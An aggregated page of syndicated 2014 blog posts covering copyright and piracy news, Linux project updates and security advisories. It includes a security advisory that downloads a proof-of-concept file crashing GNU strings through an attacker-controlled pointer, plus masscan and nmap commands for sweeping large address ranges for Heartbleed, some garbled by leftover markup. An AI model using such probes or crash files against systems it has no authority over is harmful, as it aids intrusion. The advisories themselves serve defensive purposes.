GattaNegra's days: Водопад (битовизми)

This post was syndicated from: GattaNegra's days and was written by: GattaNegra. Original post: at GattaNegra's days

Честит първи сняг! А аз си имам частен водопад у нас   или с други думи – битовизмите нямат край. Прибирам се вчера от работа и дружно установяваме теч на тавана над пералнята. Днес разбрахме, че е спукана тръбата на парното по такъв начин, че тече от 5-тия до първия етаж. В такива ситуации инфолинията […]

TorrentFreak: Embedding Is Not Copyright Infringement, EU Court Rules

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

carembedOne of the key roles of the EU’s Court of Justice is to interpret European law to ensure that it’s applied in the same manner across all member states.

The Court is also called upon by national courts to clarify finer points of EU law to progress local cases with Europe-wide implications.

This week the Court of Justice issued a landmark ruling on one such case that deals with a crucial and integral part of today’s Internet. Is it legal to embed copyrighted content without permission from the rightsholder?

The case in question was referred to EU’s Court of Justice by a German court. It deals with a dispute between the water filtering company BestWater International and two men who work as independent commercial agents for a competitor.

Bestwater accused the men of embedding one of their promotional videos, which was available on YouTube without the company’s permission. The video was embedded on the personal website of the two through a frame, as is usual with YouTube videos.

While EU law is clear on most piracy issues, the copyright directive says very little about embedding copyrighted works. The Court of Justice, however, now argues that embedding is not copyright infringement.

The full decision has yet to be published officially by the Court’s website but TorrentFreak has received a copy (in German) from the defendants’ lawyer Dr. Bernhard Knies, who describes it as a landmark victory.

The Court argues that embedding a file or video is not a breach of creator’s copyrights under European law, as long as it’s not altered or communicated to a new public. In the current case, the video was already available on YouTube so embedding it is not seen as a new communication.

“The embedding in a website of a protected work which is publicly accessible on another website by means of a link using the framing technology … does not by itself constitute communication to the public within the meaning of [the EU Copyright directive] to the extent that the relevant work is neither communicated to a new public nor by using a specific technical means different from that used for the original communication,” the Court’s verdict reads.

The Court based its verdict on an earlier decision in the Svensson case, where it found that hyperlinking to a previously published work is not copyright infringement. Together, both cases will have a major impact on future copyright cases in the EU.

For Internet users it means that they are protected from liability if they embed copyrighted videos or images from other websites, for example. In addition, it may also protect streaming sites who use third-party services to embed videos, even if the source is an infringing copy.

During the days to come the Court of Justice is expected to issue official translations of the ruling as well as a press release. Many legal experts have been waiting for the decision and further analysis of the verdict’s implications is expected to follow soon after.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Bay Blockade Set For Icelandic Expansion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In common with many countries around Europe, the movie and music industries in Iceland have been working hard to cut down on copyright infringement online. To this end copyright groups including the local equivalents of the RIAA (STEF) and MPAA (SMAIS) have targeted the leader of the usual suspects, the notorious Pirate Bay.

After complaints to the police failed, STEF and SMAIS turned to web-blocking in the hope of achieving similar results to those netted by rightsholders in the UK, Italy, the Netherlands, Belgium and Denmark.

Following setbacks STEF decided to go it alone and earlier this month achieved the result they’d been looking for. The Reykjavík District Court handed down an injunction to ISPs Vodafone and Hringdu forcing them to block several domains belonging to The Pirate Bay and Deildu, a private torrent site popular with locals.

Just two weeks later and it’s now becoming clear that STEF won’t be happy until all of Iceland’s leading ISPs are blocking too.

Earlier this week the rights group demanded responses from ISPs including Sím­inn, Tal and 365 Media as to whether the companies will agree to block Pirate Bay and Deildu in the wake of the Vodafone decision. Threatening legal action, STEF gave the ISPs until Wednesday to respond.

According to local news outlet MBL, 365 Media informed STEF it was willing to at least consider the idea but both Sím­inn and Tal appear to have rejected voluntary blocking, preferring official action through the courts instead.

Sím­inn said that it is not the role of communications companies to decide which sites should be closed and which should remain open so it would need to be presented with a formal injunction in order to block Pirate Bay and Deildu. In broad terms, Tali said the same.

As a result, lawyer Tóm­as Jóns­son says that STEF will now press ahead with its efforts to obtain injunctions against the ISPs that have raised objections. Procedural issues aside, which have dogged previous efforts, it’s likely that sooner or later STEF will achieve its aims.

Finally, there has been a trend recently for under-pressure sites to look at Icelandic hosting and local .IS domains in the belief they offer improved security over those available elsewhere.

While that may indeed be true, Iceland’s domain registry has just canceled an .IS domain that was operated by people with links to Islamic State.

“This is in fact a sad day for IS­NIC. We are very sad over this. It was not an easy de­ci­sion to do this. We had a rep­utaion for never hav­ing sus­pended a do­main name. That is not the re­al­ity any­more. These peo­ple have ru­ined that for us,” said ISNIC director Jens Pé­tur Jensen.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

lcamtuf's blog: PSA: don’t run ‘strings’ on untrusted files

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Many shell users, and certainly most of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is that the tool simply scans the file for runs of printable characters and dumps them to stdout – something that is very unlikely to put you at any risk.

It is much less known that the Linux version of strings is an integral part of GNU binutils, a suite of tools that specializes in the manipulation of several dozen executable formats using a bundled library called libbfd. Other well-known utilities in that suite include objdump and readelf.

Perhaps simply by the virtue of being a part of that bundle, the strings utility tries to leverage the common libbfd infrastructure to detect supported executable formats and “optimize” the process by extracting text only from specific sections of the file. Unfortunately, the underlying library can be hardly described as safe: a quick pass with afl (and probably with any other competent fuzzer) quickly reveals a range of troubling and likely exploitable out-of-bounds crashes due to very limited range checking, say:

$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
...
$ strings strings-bfd-badptr2
Segmentation fault
...
strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4 in strings[8048000+9a000]
...
      while (--n_elt != 0)
        if ((++idx)->shdr->bfd_section)                                ← Read from an attacker-controlled pointer
          elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section;  ← Write to an attacker-controlled pointer
...
(gdb) p idx->shdr
$1 = (Elf_Internal_Shdr *) 0x41414141

The 0×41414141 pointer being read and written by the code comes directly from that proof-of-concept file and can be freely modified by the attacker to try overwriting program control structures. Many Linux distributions ship strings without ASLR, making potential attacks easier and more reliable – a situation reminiscent of one of the recent bugs in bash.

Interestingly, the problems with the utility aren’t exactly new; Tavis spotted the first signs of trouble some nine years ago.

In any case: the bottom line is that if you are used to running strings on random files, or depend on any libbfd-based tools for forensic purposes, you should probably change your habits. For strings specifically, invoking it with the -a parameter seems to inhibit the use of libbfd. Distro vendors may want to consider making the -a mode default, too.



PS. I actually had the libbfd fuzzing job running on this thing!

Lauren Weinstein's Blog: Stop the Ebola Witch-Hunt!

This post was syndicated from: Lauren Weinstein's Blog and was written by: Lauren. Original post: at Lauren Weinstein's Blog

There’s a wonderful old 1963 episode of the classic original “The Outer Limits” series called “The Sixth Finger.” It stars David McCallum as a man who is artificially and rapidly evolved into the human of the far future, both in terms of physical appearance and vastly enhanced intellect. At one critical juncture, as he surveys the pitiful confusion of the…

SANS Internet Storm Center, InfoCON: green: Scanning for Single Critical Vulnerabilities, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Where I work, we have a decentsizedIP space and scanning can be problematic. Within our IP space, we can have ~20 Million IPs available. Traditional scanning using NMAP, while effective, can take a long time even with aggressive scan setting. By leveraging new scanning technologies like Masscan (hxxps://github.com/robertdavidgraham/masscan), this scanning can be done in minutes. With moderate settings, I dont want to crash firewalls, it takes about 15 min per port.

While this example is specific to Heartbleed, I use this technique for any of the exploit-of-the-day. By using a fast port scanner to reduce the number of hosts to only the systems running the service in question, you can dramatically speed up your scan time. Additionally, within the first couple of days of an exploit, you may be using a custom script to scan rather than a plugin from an enterprise solution.

Another use case is a vulnerability found during incident response. If I determine a specific vulnerability was used to compromise a server, I then use this technique to determine other possible compromised systems. If they were not compromised, then we have them patch.

Masscan

Installing “>“>“> make install

Masscan uses a similar command line to nmap.

masscan -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000

10.0.0.0/8 -oG 10-scan-ssl – -max-rate 10000

“>–make-rate sets the speed of the scan

Once Masscan has quickly identified targets for deeper inspection, you can use your more specific tool to determine if the system is vulnerable. In this example, its an nmap plugin.

NMAP

cd /tmp

svn co https://svn.nmap.org/nmap

cd nmap

make install

To get the input file in the correct format, use the following command to get just a file with a single IP per line.

grep -v # 10-scan-443 |awk {print $2} /tmp/nmap

“>nmap -p 443,448,456,563,614,636,989,990,992,993,994,995,8080,10000 –script=ssl-heartbleed.nse -iL /tmp/nmap -oA /tmp/ssl-vul-test

Ive had mixed results with other scanners (scanrand ect..). Any other large scale scanners with which you have had good success?

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: Taiga, a new open source project management tool with focus on usability (Opensource.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Opensource.com takes
a look
at the Taiga project management tool. “It started with
the team at Kaleidos, a Madrid-based company that builds software for both
large corporations and startups. Though much of their time is spent working
for clients, several times a year they break off for their own Personal
Innovation Weeks (ΠWEEK). These are weeklong hack-a-thons dedicated to personal improvement and prototyping internal ideas of all sorts. While there, they unanimously decided to solve the biggest of their own problems: project management.

Taiga was born, and by early 2014, the team at Kaleidos was already using
Taiga for all their internal projects. Taiga Agile, LLC was formed in
February 2014 to give the project a formal structure, and the source code
was made available at GitHub.”

SANS Internet Storm Center, InfoCON: green: Shellshock via SMTP, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Ive received several reports of what appears to be shellshock exploit attempts via SMTP. The sources so far have all be webhosting providers, so Im assuming these are compromised systems.” />

The payload is an IRC perl bot with simple DDoS commands and the ability to fetch and execute further code.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Pirate Bay Sends 100,000 New Users to “Free” VPN

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

froot-vpnWith an increasing number of BitTorrent users seeking solutions to hide their identities from the outside world, VPN services have seen a spike in customers in recent years.

Pirate Bay users also have a great interest in anonymity. A survey among the site’s users previously revealed that nearly 70% already had a VPN or proxy or were interested in signing up with one.

For this last group The Pirate Bay has an interesting promotion running. For the past few days the site has replaced its iconic logo with an ad for FrootVPN, a new startup that offers free VPN accounts.

The promo has has been seen by millions of people, many of whom very interested in the costless offer.

Since VPNs are certainly not free to run, many people are wondering if there’s a catch behind this rather generous offer. Previously TPB advertised an adware ridden client so this suspicion is understandable.

TorrentFreak contact the Pirate Bay team for more information, and they informed us that the FrootVPN promotion is not a paid ad. It’s merely a friendly plug for a startup run by some guys they know.

While that’s assuring, it doesn’t explain how they can offer their service for free. We contacted the FrootVPN operators to find out more, and they told us that they started the free VPN to counter the commercialization of the VPN business.

“The whole idea behind FrootVPN was to provide a free simple VPN service without any bandwidth limitations. Of course the maintenance isn’t free but we had some resources over from our other projects from which we were able to launch FrootVPN.”

“We are a bunch of guys who support freedom of speech and don’t like the idea that VPN providers charge so much money for just a simple proxy, especially since the bandwidth costs nowadays is so cheap,” FrootVPN tells us.

While a free VPN sounded like a good idea, the VPN service has become a victim of its own success. They gained 100,000 users in less than a week and admit that it’s not sustainable to keep the service free forever.

“The word has spread rapidly and we thank all our promoters including TPB for supporting us. We got 100,000 users within a week, which we never expected. However, this does indicate that we will be forced to charge something for the service in order to maintain it,” FrootVPN says.

FrootVPN’s VPN servers are currently hosted at Portlane, who have been very helpful in accommodating the growth. During the weeks to come they hope to increase their capacity and FrootVPN has already bought several new servers to keep the quality of the service on par.

“We have 20x servers running currently with 2x10Gbps total capacity. We have now additionally bought 40x more servers and 4x10Gbps bandwidth from Portlane which will be ready within a week or two. We hope that after this upgrade the quality of our service will be much better,” they say.

While they may have to charge a few dollars in the future, one of the main motivations of the FrootVPN team remains in line with The Pirate Bay’s original philosophy. That is, to provide tools that help to bypass censorship and promote freedom of speech.

“FrootVPN supports freedom of speech and want the Internetz to be an uncensored place,” they say.

Although free VPNs are often not the fastest, especially not when they are growing with tens of thousands of users per day, FrootVPN says it will try to keep up. In any case, “free” is an offer that’s hard to refuse for those who are on a tight budget.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Friday’s security advisories

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Debian has updated pidgin (multiple vulnerabilities).

Mageia has updated ctags (denial
of service), ejabberd (incorrectly allows
unencrypted connections), iceape (multiple
vulnerabilities), libxml2 (denial of
service), lua (code execution), openssl (multiple vulnerabilities), and phpmyadmin (cross-site scripting).

Mandriva has updated ctags (denial of service), ejabberd (incorrectly allows unencrypted connections), java-1.7.0-openjdk (multiple vulnerabilities), libxml2 (denial of service), lua (code execution), openssl (multiple vulnerabilities), and phpmyadmin (cross-site scripting).

Red Hat has updated kernel
(RHEL6.5: denial of service).

Ubuntu has updated openjdk-7
(14.10: multiple vulnerabilities).

Darknet - The Darkside: Microsoft Zero Day OLE Vuln Being Exploited In Powerpoint

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So the latest news is, don’t open any .ppt files if you aren’t entirely sure where they came from as there is a Microsoft Zero Day vulnerability in OLE (Object Linking and Embedding) handling in Microsoft Office that is currently being exploited in the wild by malicious Powerpoint slide decks. Not that anyone reading this [...]

The…

Read the full post at darknet.org.uk

SANS Internet Storm Center, InfoCON: green: Are you receiving Empty or “Hi” emails?, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

I wanted to perform a little unscientific information gathering, Im working with a small group who think theyre being specifically targeted by these, while I think its more widespread and opportunitistic. If youve recently received these no content probe emails, or a simple Hi message, please send a simple comment below in this format:

  • Industry
  • Order of magnitued in size (e.g. 10, 100, 1000)
  • Sending domain

Feel free to use our comment page to add extra analysis comments here: https://isc.sans.edu/contact.html

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: openSUSE Factory and Tumbleweed to merge

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

The openSUSE project has announced
that the “Factory” and “Tumbleweed” distributions will merge into a single
rolling distribution (called “Tumbleweed”). There is also an FAQ posting about the merger. “With
the vast improvements to the Factory development process over the last 2
years, we effectively found ourselves as a project with not one, but two
rolling release distributions in addition to our main regular release
distribution. GregKH signalled his intention to stop maintaining Tumbleweed
as a ‘rolling-released based on the current release’. It seemed a natural
decision then to bring both the Factory rolling release and Tumbleweed
rolling release together, so we can consolidate our efforts and make
openSUSE’s single rolling release as stable and effective as
possible.

Raspberry Pi: Scooter with blinkenlights

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Alex Markley, a programmer, writer and comedian, has a young relative who, thanks to a Model A Raspberry Pi, some Adafruit Neopixels, some sensors and a scooter is currently the world’s happiest nine-year-old.

I asked Alex if he’s written the project up – he says he’s working on it. We’ll add a link to any build instructions he produces as soon as they’re available.

Дни: Ранно куче – рано лае

This post was syndicated from: Дни and was written by: Антония. Original post: at Дни

Хората се будят по трети петли, ние – по първи кучета. Някъде около 3 сутринта глутницата бездомници от изоставената къща почва да джафка, скимти, вие… и така поне половин час.

На другия ден гледаш света през полуотворени очи и всичко е сиво, сиво. По кучешки.

TorrentFreak: Porn Piracy Cash Threats to Hit Virgin Media Customers

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

trolloridiotIt’s been more than seven years since so-called copyright trolls first tried their luck with the British public. UK lawfirm Davenport Lyons, a company that attempted to mislead future targets with a semi-bogus high-profile damages ‘ruling’, went into administration early 2014 but not before its partners were disciplined for targeting innocent people.

The follow-up debacle involving ACS:Law was widely documented, with owner Andrew Crossley being forced to close down his business after being suspended by the Solicitors’ Regulatory Authority for misconduct. After misleading the courts, bankruptcy was just the icing on the cake.

None of this was a deterrent to porn outfit GoldenEye International. They embarked on a similar scheme, sending letters to alleged file-sharers and demanding hundreds of pounds in settlements to make supposed lawsuits go away. However, GoldenEye learned from its predecessors by proceeding with caution and staying largely under the radar. But quite predictably and despite legal bluster and empty threats, the company took not a single case to court.

So today, quite possibly due to the tendency of the public to pay up rather than become linked with embarrassing porn movie titles, the porn trolls are back once again in the UK.

TorrentFreak has learned that last year four porn producers teamed up in an effort to force ISP Virgin Media to hand over the names and addresses of more than 1,500 subscribers said to have downloaded and shared adult content without permission.

The companies, none of which appear to be based in the UK, teamed up with Wagner & Co, the London lawfirm also working with GoldenEye. They are Mircom International Content Management & Consulting Ltd, Sunlust Pictures, Combat Zone Corporation and Pink Bonnet, Consultores de Imagem LDA.

Mircom International Content Management & Consulting Ltd are active in Europe, particularly when it comes to demanding cash settlements from alleged file-sharers in Germany. Sunlust Pictures is an adult movie company founded in 2009 by former porn actress Sunny Leone, who – entirely unsurprisingly – has featured in copyright trolling cases in the United States. Combat Zone Corporation is an adult movie company based in California. They’re no strangers to the cash settlement model either.

TorrentFreak contacted Mark Wagner at Wagner & Co to find out what his clients hope to achieve in the UK, but unfortunately our emails went unanswered. The company doesn’t appear to have a working website and its address relates to a house in residential area.

Fortunately, Virgin Media were rather more accommodating. In the past the ISP has been criticized for not doing more to protect its subscribers’ personal details but it turns out the battle with Wagner & Co has been going on for some time.

“We have contested the validity of Wagner & Co’s claims (ongoing for 12 months), asking the Judge to thoroughly review the application and the supporting evidence. We have challenged the reliability of the software used to obtain evidence of infringement (FileWatchBT) and the accuracy of the data collected,” spokesperson Emma Hutchinson told TF.

But despite Virgin Media’s efforts the High Court took the decision to side with Wagner & Co and order the ISP to hand over the details of its subscribers. While the situation is pretty grim, things could have been worse.

“The original request was for double the number of addresses than we have been forced to disclose, now fewer than 800,” Virgin explain.

“We advise any of our customers who receive a speculative letter from Wagner & Co, who also represented Golden Eye International in action against O2 customers last year, to seek independent advice from organizations such as Citizens Advice,” the ISP concludes.

Restrictions placed on GoldenEye in previous procedures indicate that initial letters sent to Virgin customers by Wagner & Co and its clients will not be as aggressive as the ones sent out by ACS:Law and will not contain a precise settlement amount. However, it is guaranteed that cash will be requested at some point.

Upon receipt of these “speculative invoices” there will be those who panic and pay up, and that’s their prerogative. But it’s highly likely that those who admit nothing and stand firm will pay what they’ve always paid in UK cases – absolutely nothing.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: ISC StormCast for Friday, October 24th 2014 http://isc.sans.edu/podcastdetail.html?id=4207, (Fri, Oct 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

xkcd.com: Houston

This post was syndicated from: xkcd.com and was written by: xkcd.com. Original post: at xkcd.com

'Oh, hey Mom. No, nothing important, just at work.'

Backblaze Blog: The New Backblaze Blog Site

This post was syndicated from: Backblaze Blog and was written by: Andy Klein. Original post: at Backblaze Blog

As you can see we’ve updated our blog. Over the years we’ve published over 300 posts and we decided we could organize things a bit better. Along the way we made changes to the layout, the categories, comments, and more. Easier to Use First, we changed the look and layout of the blog by adding….

Author information

Andy Klein

Andy Klein

Andy has 20+ years experience in technology marketing. He has shared his expertise in computer security and data backup at the Federal Trade Commission, Rootstech, RSA and over 100 other events. His current passion is to get everyone to back up their data before it’s too late.

The post The New Backblaze Blog Site appeared first on Backblaze Blog.

Linux How-Tos and Linux Tutorials: How to Get Open Source Android

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

fdroid logoAndroid is an astonishing commercial success, and is often touted as a Linux success. In some ways it is; Google was able to leverage Linux and free/open source software to get Android to market in record time, and to offer a feature set that quickly outstripped the old champion iOS.

But it’s not Linux as we know it. Most Android devices are locked-down, and we can’t freely download and install whatever operating systems we want like we can with our Linux PCs, or install whatever apps we want without jailbreaking our own devices that we own. We can’t set up a business to sell Google Android devices without jumping through a lot of expensive hoops (see The hidden costs of building an Android device and Secret Ties in Google’s “Open” Android.) We can’t even respin Google Android however we want to and redistribute it, because Google requires bundling a set of Google apps.

So where do you go to find real open source Android? Does such a thing even exist? Why yes it does.

F-Droid: FOSS Repository

There are quite a few Android repositories other than the Google Play Store, such as Amazon Appstore for AndroidSamsung Galaxy Apps, and the Opera Mobile Store. But there is only one, as far as I know, that stocks only free/open source apps, and that is F-Droid (figure 1).

F-Droid is a pure volunteer effort. It was founded in 2010 by Ciaran Gultnieks, and is now operated by F-Droid Limited, a non-profit organisation registered in England. F-Droid relies on donations and community support. The good F-Droid people perform security and privacy checks on submitted apps, though they wisely warn that there are no guarantees. F-Droid promises to respect your privacy and to not track you, your devices, or what you install. You don’t need to register for an account to use the F-Droid client, which sends no identifying information to their servers other than its version number.

To get F-Droid, all you do is download and install the F-Droid client (the download button is on the front page of the site). Easy peasey. You can browse and search apps on the website and in the client.

Other FOSS Android Directories

DroidBreak is a nice resource for finding FOSS Android apps. DroidBreak is not a software repository, but a good organized place to find apps.

AOpenSource.com is another FOSS Android directory. It gives more information on most of the apps, and has some good Android books links.

PRISM Break lists alternatives to popular closed-source propietary apps, and is privacy- and security-oriented.

Now let’s look at how to get a FOSS Android operating system.

CyanogenMod

CyanogenMod is one of the best and most popular FOSS Android variants. This is a complete replacement for Google’s Android, just like you can replace Debian with Ubuntu or Linux Mint. (Or Mint with Debian. Or whatever.) It is based on cyanogenmod logothe Android Open Source Project.

All CyanogenMod source code is freely available on their Github repository. CyanogenMod supports bales of features including CPU overclocking, controlling permissions on apps, soft buttons, full tethering with no backtalk, easier Wi-fi, BlueTooth, and GPS management, and absolutely no spyware. Which seems to be the #1 purpose of most of the apps in the Play Store. CyanogenMod is more like a real Linux: completely open and modifiable.

CyanogenMod has a bunch of nice user-friendly features: a blacklist for blocking annoying callers, a quick setting ribbon for starting your favorite apps with one swipe, user-themeable, a customizable status bar, profiles for multiple users or multiple workflows, a customizable lockscreen…in short, a completely user-customizable interface. You get a superuser and unprivileged users, all just like your favorite Linux desktop.

CyanogenMod has been ported to a lot of devices, so chances are your phone or tablet is already supported. Amazon Kindle Fire, ASUS, Google Nexus, HTC, LG, Motorola, Samsung, Sony, and lots more. A large and active community supports CyanogenMod, and the Wiki contains bales of good documentation, including help for wannabe developers.

So how do you install CyanogenMod? Isn’t that the scary part, where a mistake bricks your device? That is a real risk. So start with nothing-to-lose practice gadgets: look for some older used tablets and smartphones for cheap and practice on them. Don’t risk your shiny new stuff until you’ve gained experience. Anyway, installation is not all that scary as the good CyanogenMod people have built a super-nice reliable installer that does not require that you be a mighty guru. You don’t need to root your phone because the installer does that for you. After installation the updater takes care of keeping your installation current.

Replicant

Replicant gets my vote for best name. Please treat yourself to a viewing of the movie “Blade Runner” if you don’t get the reference. Even with a Free Android operating system, phones and tablets still use a lot of proprietary blobs, and one of the goals of Replicant is to replace these with Free software. Replicant was originally based on the Android Open Source Project, and then migrated to CyanogenMod to take advantage of their extensive device support. Replicant is a little replicant logomore work to install, so you’ll acquire a deeper knowledge of how to get software on devices that don’t want you to. Replicant is sponsored by the Free Software Foundation.

The Google Play Store has over a million apps. This sounds impressive, but many of them are junk, most of them are devoted to data-mining you for all you’re worth, and how many Mine Sweeper and Mahjongg ripoffs do you need? Android is destined to be a streamlined general-purpose operating system for a multitude of portable low-power devices (coming to a refrigerator near you! Why? Because!), and this is a great time to get acquainted with it on a deeper level.

LWN.net: Garrett: Linux Container Security

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Matthew Garrett considers the security of Linux containers on his blog. While the attack surface of containers is likely to always be larger than that of hypervisors, that difference may not matter in practice, but it’s going to take some work to get there:

I suspect containers can be made sufficiently secure that the attack surface size doesn’t matter. But who’s going to do that work? As mentioned, modern container deployment tools make use of a number of kernel security features. But there’s been something of a dearth of contributions from the companies who sell container-based services. Meaningful work here would include things like:

  • Strong auditing and aggressive fuzzing of containers under realistic configurations
  • Support for meaningful nesting of Linux Security Modules in namespaces
  • Introspection of container state and (more difficult) the host OS itself in order to identify compromises

These aren’t easy jobs, but they’re important, and I’m hoping that the lack of obvious development in areas like this is merely a symptom of the youth of the technology rather than a lack of meaningful desire to make things better. But until things improve, it’s going to be far too easy to write containers off as a “convenient, cheap, secure: choose two” tradeoff. That’s not a winning strategy.

LWN.net: Bits from the Debian multimedia maintainers

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

The Debian multimedia maintainers have put out a status report on multimedia software for the Debian 8.0 (“Jessie”) release. It covers which frameworks, plugins, applications, and so on for multimedia processing will be included in the release, as well as packages that have been dropped. “The codec library libavcodec, which is used by popular media playback
applications including vlc, mpv, totem (using gstreamer1.0-libav), xine,
and many more, has been updated to the latest upstream release version
11 provided by Libav. This provides Debian users with HEVC
playback, a native Opus decoder, Matroska 3D support, Apple ProRes, and
much more. Please see libav-changelog for a full list of functionality
additions and updates.

(Thanks to Paul Wise.)

LWN.net: Schaller: GStreamer Conference 2014 talks online

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

On his blog, Christian Schaller announced the availability of videos from the recently completed GStreamer Conference. “For those of you who like me missed this years GStreamer Conference the recorded talks are now available online thanks to Ubicast. Ubicast has been a tremendous partner for GStreamer over the years making sure we have high quality talk recordings online shortly after the conference ends. So be sure to check out this years batch of great GStreamer talks.

SANS Internet Storm Center, InfoCON: green: Digest: 23 OCT 2014, (Thu, Oct 23rd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of items for your consideration today, readers. Thanks as always to our own Rob VandenBrink for pointing out a number of these.

In case you missed it, Whats New in Windows PowerShell.

A new Snort release is available: Snort 2.97.

VMWare has released a security advisory: VMSA-2014-0011 – VMware vSphere Data Protection product update addresses a critical information disclosure vulnerability.

There”>| font-family: “>@holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Google’s New Search Downranking Hits Torrent Sites Hard

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

google-bayIn recent years Hollywood and the music industry have taken a rather aggressive approach against Google. The entertainment industry companies have accused the search engine of not doing enough to limit piracy, and demanded more stringent anti-piracy measures.

One of the suggestions often made is the removal or demotion of pirate sites in search results. A lower ranking would lead fewer people to pirate sources and promoting legal sources would have a similar effect, rightsholders argue.

While Google already began changing the ranking of sites based on DMCA complaints in 2012, it announced more far-reaching demotion measures last week. According to Google the new alghorithm changes would “visibly” lower the search rankings of the most notorious pirate sites, and they were right.

TorrentFreak has spoken with various torrent site owners who confirm that traffic from Google has been severely impacted by the recent algorithm changes. “Earlier this week all search traffic dropped in half,” the Isohunt.to team told us.

The drop is illustrated by a day-to-day traffic comparison before and after the changes were implemented, as shown below. The graph shows a significant loss in traffic which Isohunt.to solely attributes to Google’s recent changes.

Torrent site traffic drop
traffic drop

The downranking affects all sites that have a relatively high percentage of DMCA takedown requests. When Google users search for popular movie, music or software titles in combination with terms such as “download,” “watch” and “torrent”, these sites are demoted.

The new measures appear to be far more effective than previous search algorithm changes, and affect all major ‘pirate’ sites. Below is an overview of the SEO visibility of several large torrent sites in the UK and US, based on a list of 100 keywords.

Google SEO visibility torrent sites
seo-visibility

The true impact varies from site to site, depending on how much it relies on Google traffic. Confirming their earlier stance, The Pirate Bay team told TorrentFreak that they are not really concerned about the changes as they have relatively little traffic from Google.

“That Google is putting our links lower is in a way a good thing for us. We’ll get more direct traffic when people don’t get the expected search result when using Google, since they will go directly to TPB,” they said.

To get an idea of how the search results have changed we monitored a few search phrases that were likely to be affected. The before and after comparisons, which are only three days apart, show that popular ‘pirate sites’ have indeed disappeared.

A search for “Breaking Bad torrent” previously featured Kickass.to, Torrentz.eu and Isohunt.com on top, but these have all disappeared. Interestingly, in some cases their place has been taken by other less popular torrent sites.

old – “Breaking Bad torrent” – new
breaking bad torrent

The top torrent sites have also vanished from a search for the movie The Social Network. “The Social Network download” no longer shows results from Kickass.to, ThePirateBay.se and Movie4k.to but shows the IMDb profile on top instead.

old – “The Social Network download” – new
the social network download

Searches for music tracks have changed as well. The phrase “Eminem lose yourself mp3″ no longer shows links to popular MP3 download sites such as MP3Skull.com, but points to legal sources and lesser known pirate sites.

old – “Eminem lose yourself mp3″ – new
eminemp3

The traffic data and search comparisons clearly show that Google’s latest downranking changes can have a severe impact on popular “pirate” sites. Ironically, the changes will also drive a lot of traffic to smaller unauthorized sources for the time being, but these will also be demoted as their takedown notice count increases.

Rinse and repeat.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.